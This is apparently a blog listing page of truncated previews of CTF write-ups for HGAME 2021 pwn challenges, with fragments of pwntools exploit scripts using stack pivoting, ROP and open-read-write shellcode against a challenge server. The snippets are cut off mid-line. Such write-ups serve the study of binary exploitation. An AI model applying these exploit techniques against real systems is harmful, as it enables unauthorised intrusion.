hgame
TTYflag
ctf pwn菜鸡选手
qq 1617889365
展开
-
hgame2021 week3 pwn刷题
blackgive 栈迁移 from pwn import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) #p = process('./blackgive') p =remote('182.92.108.71',30459) elf = ELF('./blackgive') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') puts_plt =原创 2021-02-21 20:08:16 · 385 阅读 · 3 评论 -
hgame2021 week2 pwn刷题
rop_primary 矩阵相乘,算法分析用过numpy就直接调用numpy现有的库了,常规栈溢出,但是不知道为什么system的系统调用貌似被禁用了,所以用了orw,没拿shell from pwn import* import numpy as np from LibcSearcher import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) elf = ELF('./rop_prim原创 2021-02-14 20:02:56 · 403 阅读 · 0 评论 -
Hgame 2021 week1 pwn刷题
whitegive 签到 from pwn import* context.log_level = 'debug' p = remote('182.92.108.71',30210) p.sendlineafter(':',str(0x402012)) p.interactive() letter 开了沙箱,NX未开 orw思路,shellocde from pwn import* context.log_level = 'debug' libc = ELF('/lib/x86_64-linux-gnu/原创 2021-02-06 20:25:41 · 1410 阅读 · 8 评论